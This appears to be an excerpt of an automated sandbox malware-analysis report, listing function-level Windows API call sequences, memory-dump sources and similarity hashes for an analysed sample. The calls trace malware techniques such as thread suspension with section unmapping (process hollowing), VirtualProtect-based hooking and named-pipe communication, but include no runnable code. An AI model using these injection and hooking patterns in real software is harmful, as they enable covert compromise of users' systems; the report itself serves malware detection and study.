  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
